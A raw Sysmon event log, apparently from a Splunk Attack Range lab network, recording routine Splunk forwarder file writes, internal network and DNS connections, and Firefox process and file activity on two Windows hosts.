07:41:58.586{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-02AD-60E8-0A00-00000000CF01}616C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001045419Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:41:59.938{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20A08912DD30BBCEA515C329C8897F7F,SHA256=C6294CF7382A39E4F08FB12E87A5994D360171EE3A821DBAE65BD6D13084B922,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805675Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:41:59.517{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8FE2F5AACB088B71FD20809F0253F5F,SHA256=D10F670FB4801CDC1A4B8AEED89547048E770CCBA496D567DD77D8EC68F5BB7D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045418Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:41:59.600{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=C1BC07E5FD8A18F8F289EDA395661EA4,SHA256=AA70BC0CB8036F67BD83D1671016762B24DCF1085A7E5030F5EA82BF867967D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045417Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:41:59.600{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=CBF67D2AD4D8339926B6765FF7D4FDFF,SHA256=18BA55D4C5E14B2528EFAA3F395781582CC9867D21D1A49C33C1D1BDC5156BA7,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001045416Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:41:50.214{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50871-false10.0.1.12-8089- 23542300x80000000000000001045421Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:00.941{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B0BB03939B9078AA7DA729440F04064C,SHA256=5E37DB3A3994084D14935183E9C5F03A2F8398C829D253613AD60BD7FF85382B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805677Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:00.533{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F98B8562EC3FF0EDCEF1CE987CE3BA2,SHA256=8469AB290C93D1C52250424C16E62C17A827D3C03FB9287543B49059CC598BA0,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001045420Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:41:52.153{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local64247- 354300x8000000000000000805676Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:41:59.260{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57126-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001045425Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:01.957{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=554F243D88270D19315DE6497E761E49,SHA256=C2B1CCD2E8F6575CB87B9D8B311FCC6A727725B2AAAF51C9947C7A436D633440,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805678Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:01.533{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=68B634E6E2CCE025D8E08903B65BCF60,SHA256=A3787A1C69EC2103F3D78F7EBA0F5B9A887E2381D193B034EA316B92599C67A2,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001045424Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:41:53.596{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50873-false10.0.1.12-8000- 354300x80000000000000001045423Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:41:52.158{466BC892-02AF-60E8-1300-00000000CF01}976C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcptruefalse10.0.1.14win-dc-890.attackrange.local50872-false8.238.35.126-80http 354300x80000000000000001045422Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:41:52.155{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local55778- 23542300x80000000000000001045426Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:02.957{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A30BD5D7596BB08C2611B2B1740256F3,SHA256=620C9A6791F7E1C4DFE66A9B225B41BAC50DCB23B3A0ED30F1CE737A34955A85,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805679Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:02.533{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5EC7324614A8879D0A74CC53DA3F2F5E,SHA256=EF8D594A7F7B60FAB68C3BA15002976674DF0C4D0134946AEDCD0411DAF33157,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045427Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:03.975{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8844D52D65A510A746BFC61D1B862716,SHA256=8F8373F364036FD59A552E50A7F191ECBFB1DB017063645873202CBE64EDFFC9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805680Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:03.548{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B1197E36AD67547747566B47DDE39D3C,SHA256=66196EEC676ACD217674A7367AB170C24769F424DC39C5D30BA8FCCB137567F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045428Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:04.990{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=165982A779DC6FE4BEBA234F80DBE516,SHA256=84D08DAD73D4237BA3A659BA2A6E29BB78C5378F4908098B520A510AD8B503BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805681Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:04.564{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=96F884B57D130FA3D98F66A2D86ECEDF,SHA256=B797843575637030C8000AD34E1B1263C834FFD13512DC87EBF86CCF8D97BF9E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805682Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:05.564{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=77C50792D51F70CB56B3BD200FA57410,SHA256=3123811B531BF305DFBB55413D4F36993D116E25774F91E843B232DD1A3CADB2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000805684Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:05.260{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57127-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000805683Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:06.564{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=646412085DBCC5925C653B4F81C63166,SHA256=D5BD8E8B81598A5D3BC12960E0E32E4FE2B72641C2FF8FA268C7D4C64ADD4698,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045434Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:06.089{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001045433Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:06.042{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-5563-60E8-2010-00000000CF01}4048C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 10341000x80000000000000001045432Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:06.042{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-5563-60E8-2010-00000000CF01}4048C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 18141800x80000000000000001045431Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-ConnectPipe2021-07-12 07:42:06.042{466BC892-3462-60E8-100C-00000000CF01}8944\chrome.4048.407.111828348C:\Program Files\Mozilla Firefox\firefox.exe 17141700x80000000000000001045430Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 07:42:06.042{466BC892-5563-60E8-2010-00000000CF01}4048\chrome.4048.407.111828348C:\Program Files\Mozilla Firefox\firefox.exe 23542300x80000000000000001045429Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:06.023{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=504F6979523580F915836A0A9DBE7762,SHA256=77480C73A5AD5B96CBB6741C7385A537AC546319F915039507ED4A2FFC98793C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805685Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:07.580{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=36B3FFA979A88BE4783D6929F2D41C51,SHA256=5D4567E7B1ECBA8474EB86DEFD2F4F5A2FF6D96022198692E228FE662FD1C6FB,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001045436Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:41:58.733{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50874-false10.0.1.12-8000- 23542300x80000000000000001045435Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:07.042{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=97660B17F797A18D471A25E5A166AA69,SHA256=672CFFF18E07404C680EBA28A9441BDCC9CFE476195F7531CA091D3E1250016F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805686Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:08.611{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B179557545AE417C4B7657E0D370E189,SHA256=583B590791A94A155BAB1E40C46845174D709A4A74BDF248AE8F91EEA2B79DB1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045448Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:08.503{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=94D4F9052682CFE6283A54C4E4376C06,SHA256=BA63BF21A83DF5614C9424572E4028897026840F32E0E8E64C4C4904177ACB69,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045447Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:08.487{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=6A629D24517E6F2A83ACC3A5D9CC4358,SHA256=60CE43DA74477129D0FCA03CD8A1E832337851551CDF483B220182CA61A1923B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045446Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:08.487{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=F45FDA3FD0F97B5D3C8556F513FA4895,SHA256=FBB6959C8F364BC86C786DDAC07755D33BB96BB468932B25ED3539BCD58A6D4C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045445Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:08.487{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=EB5CC9BE3B286DB07B553415F47684AB,SHA256=D0FB082507B27BAFB8574C9F9D0F230DAE15350656658A7A2D7706FE3012F9F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045444Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:08.487{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=D293774C52B1A2862BBBE0DD0582517A,SHA256=436711D842EB0125C3364ECCF942287130125766C83CCF0C88C2F0A8BA20C0A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045443Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:08.487{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=C745088EC979F9F34A53DC296B2DA81A,SHA256=389EE94F5E6004414EA0D0D06F816C2573FF42612FED739B5D0078AE297847E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045442Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:08.487{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=4C8364AE8724C6AE4E9547B6F192FA5D,SHA256=51E4EDCBB77648A343FCA6FD6A3298B04B34B6585AE4EC7EBC322676FE6E1951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045441Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:08.487{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=0ED92001D2219449A196572B56919B56,SHA256=4B28F26BAB8D74AF9ED4F8203224D75973A6E6FB5B11E553309A396C00AF674E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045440Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:08.487{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=A2C9298C1C5463F3E1332779B8CFB0A3,SHA256=427AE1783979DAE45176380F6F207E0E18BA1EAE1E043AFF51360150F3D3B187,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045439Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:08.487{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=0A3DCB1B0CE4B5DA13DAF653A3B18464,SHA256=2BA8FD8A43D68DCDB02E5693E3C74BF140F7978F5E69A2C2E8FF02202DB7016C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045438Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:08.487{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=85AC2A30DEE5697C6DB58F799D32D13D,SHA256=E67E5BEF0480F7DFEE9D1975C9F21B16633758A656A36EB8545C3CFC78216E27,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045437Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:08.057{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33B5BA0F79B4FEF31CCE895E3A9C02FE,SHA256=108898A3E635FD9326F51183F19DB4F8DDCE61A390E49FB1A7036697FEBA88F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805687Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:09.658{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=00512F5E03E0F6F32B422B8CC3953E9B,SHA256=0DA22B9AE002AD83CDAD36D743BA5FFE604E4D1D06FC02BE9B8266291CC0A0D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045449Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:09.071{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C8CCD67913796F910BC36FD7A806DB83,SHA256=784CAFC11EEF99D9675C4E30247E359AA867BAB2F0FDCEDAB0263751E5F74C88,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000805688Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:10.705{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16E1015CFB33E3FF4312B860682FFF38,SHA256=6FCF14D174BC3A6176067925833E3EC1AFA42B87274752B3FCEA27D8D1BB0D1A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045450Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:10.086{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D956EDBD8D8C6E1326A316421C20B821,SHA256=C8A969EA792F85CB601D9984252FE99552D0D71C5406FD19B0BC5CA6E2AFD1DB,IMPHASH=00000000000000000000000000000000falsetrue 